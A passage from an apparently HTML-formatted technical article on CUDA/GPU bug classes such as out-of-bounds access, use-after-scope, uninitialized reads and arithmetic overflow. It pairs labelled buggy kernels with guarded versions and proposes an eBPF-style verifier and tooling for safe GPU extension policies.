  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;   &lt;span class="c1"&gt;// OOB write&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
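
&lt;p&gt;A minimal sketch of a guarded version of the kernel above. It assumes &lt;code&gt;n&lt;/code&gt; is the number of elements in &lt;code&gt;a&lt;/code&gt; (the example does not say so), and the name &lt;code&gt;k_guarded&lt;/code&gt; is made up for illustration:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Assumption: n is the element count of a.
__global__ void k_guarded(float* a, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  int idx = tid + 1024;
  if (idx &amp;lt; n) {   // only threads whose target is in range perform the write
    a[idx] = 0.0f;
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;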



&lt;h4&gt;
  
  
  Bug example (Use-After-Scope)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__device__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;bad&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;          &lt;span class="c1"&gt;// returns pointer to dead stack frame (UAS)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bad&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;          &lt;span class="c1"&gt;// UAS read&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Compute Sanitizer &lt;code&gt;memcheck&lt;/code&gt; precisely detects OOB/misaligned accesses (and can detect memory leaks).(&lt;a href="https://docs.nvidia.com/compute-sanitizer/ComputeSanitizer/index.html" rel="noopener noreferrer"&gt;NVIDIA Docs&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Oclgrind reports invalid memory accesses in its simulator.(&lt;a href="https://github.com/jrprice/Oclgrind" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;ESBMC-GPU checks pointer safety and array bounds as part of its model checking.(&lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE's evaluation includes out-of-bounds global memory accesses as error cases.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Wu et al.: "unauthorized memory access" appears in root-cause characterization.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;cuCatch explicitly targets temporal violations using tagging mechanisms and discusses UAF/UAS detection.(&lt;a href="https://d1qx31qr3h6wln.cloudfront.net/publications/PLDI_2023_cuCatch_2.pdf" rel="noopener noreferrer"&gt;d1qx31qr3h6wln.cloudfront.net&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Guardian: PTX-level instrumentation + interception to fence illegal memory accesses under GPU sharing.(&lt;a href="https://arxiv.org/pdf/2401.09290" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Bounds-check instrumentation at the PTX level (Guardian/cuCatch-style):&lt;/strong&gt; insert base+bounds checks (or partition fencing) around loads/stores, and intercept runtime calls so illegal accesses are fenced.(&lt;a href="https://arxiv.org/pdf/2401.09290" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Temporal tagging + runtime checks (cuCatch-style):&lt;/strong&gt; tag allocations, track which allocation each pointer belongs to, and validate the tag before each dereference.(&lt;a href="https://d1qx31qr3h6wln.cloudfront.net/publications/PLDI_2023_cuCatch_2.pdf" rel="noopener noreferrer"&gt;d1qx31qr3h6wln.cloudfront.net&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Static verification (ESBMC-GPU):&lt;/strong&gt; model checking for pointer safety and array bounds.(&lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;This is the "classic verifier" portion: keep eBPF-like pointer tracking, bounds checks, and restricted helpers. The simplest rule for policies is to &lt;strong&gt;ban arbitrary pointer dereferences&lt;/strong&gt; and force all memory access through safe helpers (maps/ringbuffers). Ideally, policies cannot allocate or free memory: all policy-visible objects are managed by the extension runtime and remain valid for the whole policy execution, so UAF/UAS is ruled out by construction. For regression testing, run policy-enabled kernels under Compute Sanitizer &lt;code&gt;memcheck&lt;/code&gt; in CI.&lt;/p&gt;
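
&lt;p&gt;To make the helper-only rule concrete, here is a rough sketch of what a policy-facing map helper could look like. Everything in it (&lt;code&gt;PolicyArrayMap&lt;/code&gt;, &lt;code&gt;policy_map_lookup&lt;/code&gt;, &lt;code&gt;policy_count_event&lt;/code&gt;) is a hypothetical name chosen for illustration, not an API of any existing framework:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Hypothetical runtime-owned array map (illustrative names only).
struct PolicyArrayMap {
  unsigned long long* slots;  // allocated and freed by the runtime, never by a policy
  unsigned int num_slots;     // fixed when the map is created
};

// The only way policy code reaches map memory.
// Returns nullptr instead of an out-of-range pointer.
__device__ unsigned long long* policy_map_lookup(const PolicyArrayMap* m,
                                                 unsigned int key) {
  if (key &amp;gt;= m-&amp;gt;num_slots) return nullptr;
  return &amp;amp;m-&amp;gt;slots[key];
}

// Policy body: an eBPF-style verifier would reject it if the null check were missing.
__device__ void policy_count_event(const PolicyArrayMap* m, unsigned int key) {
  unsigned long long* v = policy_map_lookup(m, key);
  if (v != nullptr) {
    atomicAdd(v, 1ULL);
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Because the policy never computes an address itself, spatial safety reduces to checking that every pointer returned by the helper is null-checked before use.&lt;/p&gt;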

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E) for policy memory. Static-sound for spatial safety (helper-only access with tracked bounds); By-construction for temporal safety (runtime-managed objects, no policy malloc/free). Strong soundness with low completeness (raw pointer arithmetic rejected).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The eBPF approach: (1) ban arbitrary pointer dereferencing; (2) all memory access through verified helpers (map lookup, ringbuffer write); (3) verifier tracks pointer provenance and bounds; (4) policy-visible objects are runtime-managed (no policy malloc/free): UAF/UAS impossible by construction because objects remain valid for the policy's lifetime. This provides strong memory safety for policy code without analyzing the kernel.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: Compute Sanitizer &lt;code&gt;memcheck&lt;/code&gt; precisely detects OOB/misaligned accesses and memory leaks; cuCatch explicitly targets temporal violations using tagged base&amp;amp;bounds mechanisms and discusses UAF/UAS detection (some deterministic, some probabilistic); ESBMC-GPU checks pointer safety and array bounds via bounded model checking; GKLEE's evaluation includes out-of-bounds global memory accesses as error cases; Wu et al. characterize "unauthorized memory access" in their root-cause analysis; Guardian provides PTX-level instrumentation + interception for multi-tenant memory isolation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policy memory safety doesn't protect against &lt;em&gt;kernel&lt;/em&gt; bugs. For multi-tenant fault isolation in spatial sharing (streams/MPS), Guardian-style PTX instrumentation or hardware isolation is needed to prevent one tenant's OOB from crashing others: policy verification alone is insufficient for system-wide isolation.&lt;/p&gt;

&lt;h4&gt;
  
  
  Multi-tenant implications
&lt;/h4&gt;

&lt;p&gt;In spatial sharing (streams/MPS), kernels share a GPU address space. An OOB access by one application can crash other co-running applications (fault isolation issue). Guardian's motivation explicitly calls out this problem and designs PTX-level fencing + interception as a fix.(&lt;a href="https://arxiv.org/pdf/2401.09290" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;) This directly supports the "availability is correctness" story: if policies run in privileged/shared contexts, you must prevent policy code from generating OOB accesses. Either: (a) only allow map helpers (no raw memory), or (b) instrument policy memory ops with bounds checks (Guardian-style PTX rewriting).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example (multi-tenant OOB, conceptual)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Tenant A kernel writes OOB and corrupts Tenant B memory in same context.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
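
&lt;p&gt;One way to picture option (b) is address fencing by masking. The sketch below assumes each tenant owns a power-of-two-sized partition aligned to its own size; &lt;code&gt;Partition&lt;/code&gt;, &lt;code&gt;fenced_elem&lt;/code&gt;, and &lt;code&gt;tenant_kernel&lt;/code&gt; are hypothetical names, and the code is written in the spirit of Guardian-style fencing rather than as a reproduction of its actual instruction sequence:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Assumption: a tenant's partition is a power-of-two size and aligned to that size.
struct Partition {
  unsigned long long base;  // partition start address
  unsigned long long mask;  // partition size - 1
};

// Force the address of a[i] into the tenant's partition:
// keep the low offset bits, replace the high bits with the partition base.
__device__ float* fenced_elem(float* a, long long i, Partition part) {
  unsigned long long addr = reinterpret_cast&amp;lt;unsigned long long&amp;gt;(a)
                          + static_cast&amp;lt;unsigned long long&amp;gt;(i) * sizeof(float);
  addr = part.base | (addr &amp;amp; part.mask);
  return reinterpret_cast&amp;lt;float*&amp;gt;(addr);
}

__global__ void tenant_kernel(float* a, long long offset, Partition part) {
  long long i = offset + (long long)blockIdx.x * blockDim.x + threadIdx.x;
  // An out-of-partition index wraps around inside the tenant's own memory
  // instead of touching a co-tenant's allocation.
  *fenced_elem(a, i, part) = 0.0f;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Masking does not report the bug; it only confines its effects to the faulting tenant, which is the property that matters for fault isolation.&lt;/p&gt;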



&lt;h4&gt;
  
  
  Bug example (Uninitialized Memory)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="c1"&gt;// 'in' was cudaMalloc'd but never initialized or memset&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;2.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// reading uninitialized memory&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Uninitialized Memory: additional notes
&lt;/h4&gt;

&lt;p&gt;Reading device global memory that was never initialized yields nondeterministic values. This is a frequent source of heisenbugs because GPU concurrency amplifies the nondeterminism. Compute Sanitizer &lt;code&gt;initcheck&lt;/code&gt; reports cases where device global memory is accessed without being initialized.(&lt;a href="https://docs.nvidia.com/compute-sanitizer/ComputeSanitizer/index.html" rel="noopener noreferrer"&gt;NVIDIA Docs&lt;/a&gt;) For policies, require explicit initialization semantics (e.g., a map lookup returns "not found" unless the slot has been initialized, and reading uninitialized slots is forbidden).&lt;/p&gt;
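
&lt;p&gt;A small sketch of the "not found unless initialized" rule for policy maps. The &lt;code&gt;PolicySlot&lt;/code&gt; layout and the &lt;code&gt;policy_slot_read&lt;/code&gt; helper are hypothetical, and the sketch assumes the runtime zeroes the slot array at creation and finishes writing slots before the policy runs:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Hypothetical slot layout; the runtime zeroes the array when the map is created.
struct PolicySlot {
  unsigned int initialized;  // 0 until the runtime stores a value
  float value;
};

// Returns false ("not found") for out-of-range keys and for slots never written,
// so a policy cannot observe uninitialized contents.
__device__ bool policy_slot_read(const PolicySlot* slots, unsigned int num_slots,
                                 unsigned int key, float* out) {
  if (key &amp;gt;= num_slots) return false;
  if (slots[key].initialized == 0u) return false;
  *out = slots[key].value;
  return true;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;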




&lt;h3&gt;
  
  
  19) Arithmetic Errors (overflow, division by zero) [Correctness/Safety, CPU-shared]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Arithmetic errors such as integer overflow and division by zero can corrupt keys and indices, then cascade into memory-safety violations and performance problems.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;divisor&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;divisor&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// div-by-zero if divisor == 0&lt;/span&gt;

  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;1000000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;       &lt;span class="c1"&gt;// overflow for large tid&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;                  &lt;span class="c1"&gt;// corrupted index =&amp;gt; OOB&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;ESBMC-GPU explicitly lists arithmetic overflow and division-by-zero among the properties it checks for CUDA programs (alongside races/deadlocks/bounds).(&lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Model checking (ESBMC-GPU):&lt;/strong&gt; static verification of arithmetic properties.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lightweight runtime checks:&lt;/strong&gt; guard div/mod operations.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Optional but reviewer-friendly: add lightweight verifier checks for div-by-zero and dangerous shifts, and constrain pointer arithmetic (already typical in eBPF verifiers). For "perf correctness," overflow in index computations is a common hidden cause of random/uncoalesced patterns.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Arithmetic errors depend only on the policy's operations and input value ranges, providing strong soundness via range analysis with medium completeness (complex arithmetic may require explicit assertions).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier performs lightweight static checks: (1) division: require static proof that divisor ≠ 0, or insert runtime guards; (2) overflow: use saturating arithmetic, or prove bounds on operands; (3) dangerous shifts: validate shift amounts; (4) index arithmetic: track value ranges to catch OOB before memory access. This is already typical in eBPF verifiers and adds minimal overhead to policy verification.&lt;/p&gt;
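
&lt;p&gt;The runtime-guard options in (1) and (2) could look roughly like the sketch below. The helper names &lt;code&gt;guarded_div&lt;/code&gt; and &lt;code&gt;saturating_index&lt;/code&gt;, the fallback value, and the added parameter &lt;code&gt;n&lt;/code&gt; (the length of both arrays) are assumptions made for illustration:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;#include &amp;lt;climits&amp;gt;

// Division guard: returns a fallback instead of dividing by zero.
// INT_MIN / -1 is guarded too, because its result does not fit in an int.
__host__ __device__ inline int guarded_div(int num, int den, int fallback) {
  if (den == 0) return fallback;
  if (num == INT_MIN) {
    if (den == -1) return fallback;
  }
  return num / den;
}

// Saturating index computation: multiply in 64 bits, then clamp to [0, limit].
// Assumes limit is non-negative.
__host__ __device__ inline int saturating_index(int tid, int scale, int limit) {
  long long wide = static_cast&amp;lt;long long&amp;gt;(tid) * scale;
  if (wide &amp;lt; 0) return 0;
  if (wide &amp;gt; limit) return limit;
  return static_cast&amp;lt;int&amp;gt;(wide);
}

// Assumption: in and out both hold n elements.
__global__ void k_checked(int* out, const int* in, int divisor, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  if (tid &amp;gt;= n) return;
  int idx = saturating_index(tid, 1000000, n - 1);  // stays within [0, n - 1]
  out[tid] = guarded_div(in[idx], divisor, 0);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Clamping changes the result for overflowing inputs, so a verifier that can prove operand bounds statically may prefer to reject the policy rather than insert the guard silently.&lt;/p&gt;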

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ESBMC-GPU explicitly lists arithmetic overflow and division-by-zero among the properties it checks for CUDA programs (alongside races/deadlocks/bounds) via bounded model checking.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies with complex arithmetic that happens to be safe may need explicit assertions or be conservatively rejected. Cascade risk: arithmetic errors often cascade into memory safety bugs (corrupted indices → OOB) or performance bugs (overflow in index computations causing random/uncoalesced patterns). The verifier should track value ranges through index computations proactively to catch these before they become downstream violations.&lt;/p&gt;




&lt;h3&gt;
  
  
  Summary: Improper Synchronization as a Root-Cause Category (Wu et al.'s Three-Way Taxonomy)
&lt;/h3&gt;

&lt;p&gt;Wu et al.'s empirical study explicitly groups CUDA-specific synchronization issues into three concrete bug types: &lt;strong&gt;data race&lt;/strong&gt;, &lt;strong&gt;barrier divergence&lt;/strong&gt;, and &lt;strong&gt;redundant barrier functions&lt;/strong&gt;. They also highlight that these often manifest as inferior performance and flaky tests. Simulee is used to find these categories in real projects.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/p&gt;

&lt;p&gt;This is exactly the "verification story" hook: a GPU extension verifier can claim that policy code cannot introduce these synchronization root causes because:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;barriers are only allowed at provably uniform control-flow points,&lt;/li&gt;
&lt;li&gt;side effects are required to be warp-uniform,&lt;/li&gt;
&lt;li&gt;helper calls are bounded,&lt;/li&gt;
&lt;li&gt;and policies run under a restricted memory model.&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  Summary: Verification Scope and Assurance Types
&lt;/h3&gt;

&lt;p&gt;Classifying the 19 bug classes by verification scope and by assurance type shows how much a load-time verifier can guarantee on its own, and where contracts or dynamic tools are still needed.&lt;/p&gt;

&lt;h4&gt;
  
  
  By Verification Scope
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Extension-local (E): 16 of 19 classes:&lt;/strong&gt;&lt;br&gt;
Twelve classes (bugs #1, #2, #4, #6, #7, #10, #11, #12, #15, #16, #18, #19) can be eliminated purely by restricting policy code, without inspecting the host kernel. Four more (bugs #3, #5, #14, #17) can be &lt;strong&gt;reduced from Combined to Extension-local&lt;/strong&gt; through state isolation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Combined (C): 2 classes requiring contracts:&lt;/strong&gt;&lt;br&gt;
Bugs #8 (block-size dependence) and #9 (launch config assumptions) fundamentally depend on kernel launch parameters. These require contract-based validation at attach time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Host+Device (H): 1 class requiring host-side tools:&lt;/strong&gt;&lt;br&gt;
Bug #13 (host↔device async races) cannot be addressed by device-side verification. Requires CuSan/TSan and careful API design.&lt;/p&gt;

&lt;h4&gt;
  
  
  By Assurance Type
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Assurance Type&lt;/th&gt;
&lt;th&gt;Bug Classes&lt;/th&gt;
&lt;th&gt;Soundness&lt;/th&gt;
&lt;th&gt;Completeness&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;By-construction&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#2, #10, #15&lt;/td&gt;
&lt;td&gt;Perfect&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Static-sound&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#1, #3, #4, #5, #6, #11, #14, #16, #17, #18, #19&lt;/td&gt;
&lt;td&gt;Strong&lt;/td&gt;
&lt;td&gt;Low-Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Static-heuristic&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#7, #12&lt;/td&gt;
&lt;td&gt;Good&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Contract-based&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#8, #9&lt;/td&gt;
&lt;td&gt;Conditional&lt;/td&gt;
&lt;td&gt;Depends on contracts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dynamic-only&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#13&lt;/td&gt;
&lt;td&gt;Executed paths only&lt;/td&gt;
&lt;td&gt;Coverage-dependent&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h4&gt;
  
  
  The Three-Stage Verification Pipeline
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Stage 1: Load-time static verifier (core, analogous to eBPF verifier)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The load-time verifier employs three tiers of analysis, ranging from outright bans on genuinely dangerous constructs to static analysis that preserves useful functionality:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Tier A — By-construction bans (3 classes, no legitimate policy use):&lt;/em&gt;&lt;/p&gt;

